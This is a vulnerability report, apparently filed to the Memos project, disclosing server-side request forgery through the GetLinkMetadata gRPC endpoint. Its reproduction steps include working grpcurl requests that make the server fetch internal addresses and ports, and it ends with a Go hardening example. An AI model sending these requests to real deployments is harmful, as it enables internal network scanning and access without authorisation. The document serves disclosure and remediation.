Describe the bug
elestio/memos:latest and neosmemo/memos:latest both have an SSRF vulnerability, which allows attackers to access intranet IP addresses and protocols. Despite efforts to limit access protocols to HTTP and HTTPS, attackers can still access other ports running on localhost. This vulnerability enables attackers to access any asset on the internal network, sniff web services on the internal network, scan hosts on the internal network, and potentially access weak internal endpoints. The vulnerability is due to insufficient validation of user-supplied URLs, which can be exploited to perform SSRF attacks.
Steps to reproduce
┌──(root㉿kali)-[~/Downloads]
└─# cat docker-compose.yaml
version: '3.3'
services:
memos:
image: 'elestio/memos:latest'
restart: always
ports:
- '172.17.0.1:5230:5230'
volumes:
- './memos/:/var/opt/memos'
┌──(root㉿kali)-[~/Downloads]
└─# docker-compose up -d
WARN[0000] /root/Downloads/docker-compose.yaml: the attribute `version` is obsolete, it will be ignored, please remove it to avoid potential confusion
[+] Running 2/2
✔ Network downloads_default Created 0.1s
✔ Container downloads-memos-1 Started 0.2s
┌──(root㉿kali)-[~/Downloads]
└─# curl --head 172.17.0.1:5230
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 1162
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Feb 2025 06:18:20 GMT
┌──(root㉿kali)-[~/Downloads]
└─# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:0d:08:46 brd ff:ff:ff:ff:ff:ff
inet 192.168.32.10/24 brd 192.168.32.255 scope global noprefixroute eth0
valid_lft forever preferred_lft forever
inet6 fd15:4ba5:5a2b:1008:87ce:957e:7a15:e7cb/64 scope global temporary dynamic
valid_lft 86375sec preferred_lft 14375sec
inet6 fd15:4ba5:5a2b:1008:20c:29ff:fe0d:846/64 scope global dynamic mngtmpaddr noprefixroute
valid_lft 86375sec preferred_lft 14375sec
inet6 fe80::20c:29ff:fe0d:846/64 scope link noprefixroute
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:d6:f1:dd:88 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
10: br-a984a394dce2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:a4:bc:23:14 brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-a984a394dce2
valid_lft forever preferred_lft forever
inet6 fe80::42:a4ff:febc:2314/64 scope link proto kernel_ll
valid_lft forever preferred_lft forever
12: veth27be711@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-a984a394dce2 state UP group default
link/ether 22:8e:89:24:39:2b brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::208e:89ff:fe24:392b/64 scope link proto kernel_ll
valid_lft forever preferred_lft forever
┌──(root㉿kali)-[~/Downloads]
└─# systemctl status apache2
● apache2.service - The Apache HTTP Server
Loaded: loaded (/usr/lib/systemd/system/apache2.service; disabled; preset: disabled)
Active: active (running) since Mon 2025-02-17 14:12:53 HKT; 5min ago
Invocation: 0d09dfdcb0c248e6994cc9a9bc8d8ced
Docs: https://httpd.apache.org/docs/2.4/
Process: 30231 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS)
Main PID: 30247 (apache2)
Tasks: 7 (limit: 9387)
Memory: 21M (peak: 21.2M)
CPU: 96ms
CGroup: /system.slice/apache2.service
├─30247 /usr/sbin/apache2 -k start
├─30249 /usr/sbin/apache2 -k start
├─30250 /usr/sbin/apache2 -k start
├─30251 /usr/sbin/apache2 -k start
├─30252 /usr/sbin/apache2 -k start
├─30253 /usr/sbin/apache2 -k start
└─30350 /usr/sbin/apache2 -k start
Feb 17 14:12:53 kali systemd[1]: Starting apache2.service - The Apache HTTP Server...
Feb 17 14:12:53 kali apachectl[30246]: AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1. Set the 'ServerName' d>
Feb 17 14:12:53 kali systemd[1]: Started apache2.service - The Apache HTTP Server.
┌──(root㉿kali)-[~/Downloads]
└─# systemctl status vsftpd
● vsftpd.service - vsftpd FTP server
Loaded: loaded (/usr/lib/systemd/system/vsftpd.service; disabled; preset: disabled)
Active: active (running) since Mon 2025-02-17 14:12:09 HKT; 6min ago
Invocation: 84be3dbceea84a53a68a404f7eb34a85
Process: 29770 ExecStartPre=/bin/mkdir -p /var/run/vsftpd/empty (code=exited, status=0/SUCCESS)
Main PID: 29772 (vsftpd)
Tasks: 1 (limit: 9387)
Memory: 1M (peak: 2M)
CPU: 31ms
CGroup: /system.slice/vsftpd.service
└─29772 /usr/sbin/vsftpd /etc/vsftpd.conf
Feb 17 14:12:09 kali systemd[1]: Starting vsftpd.service - vsftpd FTP server...
Feb 17 14:12:09 kali systemd[1]: Started vsftpd.service - vsftpd FTP server.
┌──(root㉿kali)-[~/Downloads]
└─# grpcurl -plaintext -d "{\"link\": \"http://192.168.32.10:21/\"}" 172.17.0.1:5230 memos.api.v1.MarkdownService.GetLinkMetadata
ERROR:
Code: Unknown
Message: Get "http://192.168.32.10:21/": net/http: HTTP/1.x transport connection broken: malformed HTTP status code "(vsFTPd"
┌──(root㉿kali)-[~/Downloads]
└─# grpcurl -plaintext -d "{\"link\": \"http://192.168.32.10:80/\"}" 172.17.0.1:5230 memos.api.v1.MarkdownService.GetLinkMetadata
{
"title": "Apache2 Debian Default Page: It works"
}
┌──(root㉿kali)-[~/Downloads]
└─# docker-compose down
WARN[0000] /root/Downloads/docker-compose.yaml: the attribute `version` is obsolete, it will be ignored, please remove it to avoid potential confusion
[+] Running 2/2
✔ Container downloads-memos-1 Removed 0.2s
✔ Network downloads_default Removed 0.3s
┌──(root㉿kali)-[~/Downloads]
└─# docker run -d --name memos -p 5230:5230 -v ~/.memos/:/var/opt/memos neosmemo/memos
Unable to find image 'neosmemo/memos:latest' locally
latest: Pulling from neosmemo/memos
Digest: sha256:4723d86e6797fd629f1f2ff7afd4e37e669df7318f00de31c7ff9acf1fe9db7f
Status: Downloaded newer image for neosmemo/memos:latest
e222cc3bc60be3e4746053f3475dcf25cc6cebfc0efad764d2238e1ee174bbc6
┌──(root㉿kali)-[~/Downloads]
└─# docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
e222cc3bc60b neosmemo/memos "./entrypoint.sh ./m…" 21 seconds ago Up 20 seconds 0.0.0.0:5230->5230/tcp, :::5230->5230/tcp memos
┌──(root㉿kali)-[~/Downloads]
└─# docker inspect e22 | grep -i "ipaddress"
"SecondaryIPAddresses": null,
"IPAddress": "172.17.0.2",
"IPAddress": "172.17.0.2",
┌──(root㉿kali)-[~/Downloads]
└─# grpcurl -plaintext -d "{\"link\": \"http://192.168.32.10/\"}" 172.17.0.2:5230 memos.api.v1.MarkdownService.GetLinkMetadata
{
"title": "Apache2 Debian Default Page: It works"
}
┌──(root㉿kali)-[~/Downloads]
└─# grpcurl -plaintext -d "{\"link\": \"http://192.168.32.10:21/\"}" 172.17.0.2:5230 memos.api.v1.MarkdownService.GetLinkMetadata
ERROR:
Code: Unknown
Message: Get "http://192.168.32.10:21/": net/http: HTTP/1.x transport connection broken: malformed HTTP status code "(vsFTPd"
Dear dev, please pay attention to the "memos-main\plugin\httpgetter\html_meta.go" file, where http.Get(urlStr) is called within the GetHTMLMeta function.
The version of Memos you're using
latest
Screenshots or additional context
No response
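One way to harden the kind of `http.Get(urlStr)` fetch the report points at, shown as an added example (not Memos code and not the project's actual fix). It checks the resolved IP at dial time, so literal internal addresses, hostnames that resolve internally, and redirects are all covered; `isPublicIP`, `dialControl` and `safeGet` are hypothetical names.

```go
package main

import (
	"fmt"
	"net"
	"net/http"
	"net/url"
	"syscall"
	"time"
)

// isPublicIP rejects loopback, RFC 1918 / ULA, link-local (169.254.0.0/16, fe80::/10),
// multicast and unspecified addresses.
func isPublicIP(ip net.IP) bool {
	return !(ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() ||
		ip.IsMulticast() || ip.IsUnspecified())
}

// dialControl runs after DNS resolution and before connect(), so it sees the
// address actually being dialed, including every redirect hop.
func dialControl(_, address string, _ syscall.RawConn) error {
	host, _, err := net.SplitHostPort(address)
	if err != nil {
		return err
	}
	if ip := net.ParseIP(host); ip == nil || !isPublicIP(ip) {
		return fmt.Errorf("destination not allowed: %s", address)
	}
	return nil
}

// safeGet (hypothetical replacement for a bare http.Get) allows only http/https
// and refuses to connect to non-public addresses.
func safeGet(raw string) (*http.Response, error) {
	u, err := url.Parse(raw)
	if err != nil {
		return nil, err
	}
	if u.Scheme != "http" && u.Scheme != "https" {
		return nil, fmt.Errorf("scheme not allowed: %q", u.Scheme)
	}
	d := &net.Dialer{Timeout: 5 * time.Second, Control: dialControl}
	// Proxy is left unset on purpose: with a proxy the dial target would be the proxy.
	c := &http.Client{Timeout: 10 * time.Second, Transport: &http.Transport{DialContext: d.DialContext}}
	return c.Get(raw)
}

func main() {
	_, err := safeGet("http://192.168.32.10:21/") // address taken from the report
	fmt.Println(err)
}
```

`net.IP.IsPrivate` does not cover 100.64.0.0/10 (CGNAT); add further ranges or a port allow-list if the deployment needs them.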